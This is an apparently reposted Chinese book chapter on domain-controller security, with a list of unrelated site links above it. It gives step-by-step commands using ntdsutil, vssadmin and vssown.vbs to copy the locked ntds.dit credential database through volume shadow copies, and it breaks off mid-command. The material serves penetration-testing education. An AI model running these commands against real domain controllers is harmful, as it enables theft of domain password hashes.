- 1iOS:多效果的CategoryView_ios jxcategorytitleview加个数角标
- 2Kafka相关问题及答案_头歌kafka入门篇答案
- 3Java大数据培训视频全套教程-Git教程(34)-马克-专题视频课程
- 4完美解决 ubuntu 遇到 sudo: pip: command not found_sudo: pip:找不到命令
- 5解决Unable to connect to Redis_unable to connect to redis server
- 6Java项目【仿牛客网5-6】_仿牛客网代码
- 7【华为OD笔试】2024D卷机考套题汇总【真实反馈,不断更新,限时免费】_od统一考试(2024年d卷)
- 8PoC免写攻略_yakit编写poc
- 9ubuntu14 安装ssh_ubuntu14安装ssh
- 102024最新Java面试真题解析,2024京东最新Java面试真题解析
第6章域控制器安全_{"dc":"bxza29"}
赞
踩
目录
6.2.3在Windows下解析ntds.dit并导出域账号和域散列值
6.5使用wshadow.exe和QuarksPwDumpexe导出域账号和域散列值
第6章域控制器安全
在通常情况下、即使拥有管理员权限,也无法读取域控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。
6.1使用卷影拷贝服务提取ntds.dit
在活动目录中,所有的数据都保存在 ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%ntds\ntds.dit。ntds.dit 中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被Windows操作系统锁定的。本节将介绍如何从系统中导出ntds.dit,以及如何读取ntds.dit中的信息。在一般情况下,系统运维人员会利用卷影拷贝服务(Volume Shadow Copy Service, VSS)实现这些操作。VSS本质上属快照(Snapshot)技术的一种,主要用于备份和恢复(即使目标文件处于锁定状态)。
6.1.1通过ntdsutil.exe提取ntds.dit
ntdsutil.exe是一个为活动目录提供管理机制的命令行工具。使用 ntdsutil.exe,可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导(DCPromo.exe)成功降级的域控制器留下的元数据等。该工具默认安装在域控制器上、可以在域控制器上直接操作,也可以通过域内机器在域控制器上远程操作。ntdsutil.exe支持的操作系统有 Windows Server 2003、 Windows Server 2008、 Windows Server 2012。
下面通过实验来讲解使用ntdsutil.exe提取ntds.dit的方法。
1.在域控制器的命令行环境中创建一个快照。该快照包含Windows的所有文件,且在复制文件时不会受到Windows锁定机制的限制。
ntdsutil snapshot "activate instance ntds" create quit quit
可以看到,创建了一个GUID为{c4c25fa3-510b-4ae7-92b9-a29c68c49d0f}的快照。
2.加载创建的快照
ntdsutil snapshot "mount {c4c25fa3-510b-4ae7-92b9-a29c68c49d0f}" quit quit
3.复制快照中的文件
copy C:\$SNAP_202012281442_VOLUMEC$\Windows\NTDS\ntds.dit C:\Users\Public4.卸载之前加载的快照并删除
ntdsutil snapshot "unmount {c4c25fa3-510b-4ae7-92b9-a29c68c49d0f}" "delete {c4c25fa3-510b-4ae7-92b9-a29c68c49d0f}" quit quit
5.查询当前快照
ntdsutil snapshot "List All" quit quit
6.1.2 利用 vssadmin提取 ntds.dit
vssadminn是 Windows Server 2008 & Windows 7提供的VSS管理工具,可用于创建和删除卷影拷贝、列出卷影拷贝的信息(只能管理系统 Provider创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序(writers)和提供程序(providers),以及改变卷影拷贝的存储空间(即所谓的“diff空间”)的大小等。vssadminn 的操作流程和ntdsutil类似
1.在域控制器中打开命令行环境,输入如下命令,创建一个C盘的卷影拷贝
vssadmin create shadow /for=c:2.在创建的卷影拷贝中将ntds.dit 复制出来
- copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit
- dir c:\ |findstr "ntds"
3.删除快照
vssadmin delete shadows /for=c: /quiet
6.1.3利用vssown.vbs脚本提取ntds.dit
vssown.vbs脚本的功能和vssadmin类似。vssown.vbs 脚本是由Tim Tomes开发的,可用于创建和删除卷影拷贝,以及启动和停止卷影拷贝服务。可以在命令行环境中执行该脚本。该脚本中的常用命令如下
- //启动卷影拷贝服务
- cscript vssown.vbs /start
- 1/创建一个C盘的卷影拷贝
- cscript vssown.vbs /create c
- //列出当前卷影拷贝
- cscript vssown.vbs /list
- //删除卷影拷贝
- cscript vssown.vbs /delete
1.启动卷影拷贝服务
cscript vssown.vbs /start2.创建一个C盘的卷影拷贝
cscript vssown.vbs /create c
3.列出当前卷影拷贝
cscript vssown.vbs /list
4.复制ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit c:\ntds.dit5.删除卷影拷贝
cscript vssown.vbs /delete {9AB33ECE-8FF2-49A8-9305-101993C6648E}
6.1.4使用ntdsutil的iFM创建卷影拷贝
除了按照前面介绍的方法通过执行命令来提取ntds dit,也可以使用创建一个 IFM的方式获取nsdi。在使用ntdsutil创建IFM时,需要进行生成快照、加载、将ntds. dit和计算机的SAM文件复制到目标文件夹中等操作。这些操作也可以通过PowerShell或WMI远程执行
1.在域控制器中以管理员模式打开命令行
ntdsutil "ac i ntds" "ifm" &#
